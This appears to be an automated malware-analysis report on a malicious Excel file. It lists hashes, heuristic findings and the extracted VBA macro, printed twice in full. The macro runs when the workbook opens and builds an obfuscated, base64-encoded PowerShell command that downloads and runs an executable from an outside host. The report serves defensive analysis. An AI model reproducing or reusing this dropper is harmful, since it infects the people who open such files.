Office (OLE) malware analysis — malicious · c5b3f021a6fe62d3

MALICIOUS

Office (OLE)

6.0 KB First seen: 2021-11-02

MD5: 9274ea0bd926f877953b4c77d2904d5d SHA-1: e608471775cdd438942a43deb0c48c66401587bc SHA-256: c5b3f021a6fe62d30bc05e30bdda5929899c0dce5a987ec273897434afa99eec

140 Risk Score

Heuristics 3

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2705 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2705 bytes
SHA-256: `13c35adffc297f02c8d767dee764a59dd002c92378c122d03babb4f4f380c7f8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Activate() On Error Resume Next Dim bat As String Dim s As String s = s + "start " Dim a As String s = s + "/MI" + "N C:\Wi" + "ndo" Dim dfdf As String s = s + "ws\Sys" + "tem32\" + "Wind" + "owsPo" + "wer" Dim fwefewf As String s = s + "She" + "ll\v1.0" + "\pow" + "ersh" + "ell." + "exe" Dim ewfwef As String s = s + " -win " + "1 -e" + "nc " s = s + "JABQAHIAbwBj" s = s + "AE4AYQBtAGUA" s = s + "IAA9ACAAIgBG" s = s + "AHcAYQBqAHcA" s = s + "awBsAGEAbwBi" s = s + "AHMAYQByAGoA" s = s + "eQB2AHYAbwAu" s = s + "AGUAeABlACIA" s = s + "OwAoAE4AZQB3" s = s + "AC0ATwBiAGoA" s = s + "ZQBjAHQAIABT" s = s + "AHkAcwB0AGUA" s = s + "bQAuAE4AZQB0" s = s + "AC4AVwBlAGIA" s = s + "QwBsAGkAZQBu" s = s + "AHQAKQAuAEQA" s = s + "bwB3AG4AbABv" s = s + "AGEAZABGAGkA" s = s + "bABlACgAIgBu" s = s + "AGEAbgBvAHIA" s = s + "ZwBpAG4ALgB5" s = s + "AGQAbgBzAC4A" s = s + "ZQB1AC8AbwBm" s = s + "AGYAaQBjAGUA" s = s + "LgBlAHgAZQAi" s = s + "ACwAIgAkAGUA" s = s + "bgB2ADoAQQBQ" s = s + "AFAARABBAFQA" s = s + "QQBcACQAUABy" s = s + "AG8AYwBOAGEA" s = s + "bQBlACIAKQA7" s = s + "AFMAdABhAHIA" s = s + "dAAtAFAAcgBv" s = s + "AGMAZQBzAHMA" s = s + "IAAoACIAJABl" s = s + "AG4AdgA6AEEA" s = s + "UABQAEQAQQBU" s = s + "AEEAXAAkAFAA" s = s + "cgBvAGMATgBh" s = s + "AG0AZQAiACkA" Dim x As Double ActiveWorkbook.Save bat = "Ldnpqepnzeokdw.bat" Open bat For Output As #1 Print #1, s Close #1 x = Shell(bat, 0) End Sub Attribute VB_Name = "Start" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Learn more" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Workbook" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 13c35adffc297f02c8d767dee764a59dd002c92378c122d03babb4f4f380c7f8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Workbook_Activate()
On Error Resume Next

Dim bat As String


Dim s As String

s = s + "start "
Dim a As String
s = s + "/MI" + "N C:\Wi" + "ndo"
Dim dfdf As String
s = s + "ws\Sys" + "tem32\" + "Wind" + "owsPo" + "wer"
Dim fwefewf As String
s = s + "She" + "ll\v1.0" + "\pow" + "ersh" + "ell." + "exe"
Dim ewfwef As String
s = s + " -win " + "1 -e" + "nc "


s = s + "JABQAHIAbwBj"
s = s + "AE4AYQBtAGUA"
s = s + "IAA9ACAAIgBG"
s = s + "AHcAYQBqAHcA"
s = s + "awBsAGEAbwBi"
s = s + "AHMAYQByAGoA"
s = s + "eQB2AHYAbwAu"
s = s + "AGUAeABlACIA"
s = s + "OwAoAE4AZQB3"
s = s + "AC0ATwBiAGoA"
s = s + "ZQBjAHQAIABT"
s = s + "AHkAcwB0AGUA"
s = s + "bQAuAE4AZQB0"
s = s + "AC4AVwBlAGIA"
s = s + "QwBsAGkAZQBu"
s = s + "AHQAKQAuAEQA"
s = s + "bwB3AG4AbABv"
s = s + "AGEAZABGAGkA"
s = s + "bABlACgAIgBu"
s = s + "AGEAbgBvAHIA"
s = s + "ZwBpAG4ALgB5"
s = s + "AGQAbgBzAC4A"
s = s + "ZQB1AC8AbwBm"
s = s + "AGYAaQBjAGUA"
s = s + "LgBlAHgAZQAi"
s = s + "ACwAIgAkAGUA"
s = s + "bgB2ADoAQQBQ"
s = s + "AFAARABBAFQA"
s = s + "QQBcACQAUABy"
s = s + "AG8AYwBOAGEA"
s = s + "bQBlACIAKQA7"
s = s + "AFMAdABhAHIA"
s = s + "dAAtAFAAcgBv"
s = s + "AGMAZQBzAHMA"
s = s + "IAAoACIAJABl"
s = s + "AG4AdgA6AEEA"
s = s + "UABQAEQAQQBU"
s = s + "AEEAXAAkAFAA"
s = s + "cgBvAGMATgBh"
s = s + "AG0AZQAiACkA"


Dim x As Double

ActiveWorkbook.Save

bat = "Ldnpqepnzeokdw.bat"

Open bat For Output As #1
    Print #1, s 
    Close #1
    x = Shell(bat, 0)

End Sub


Attribute VB_Name = "Start"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Learn more"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.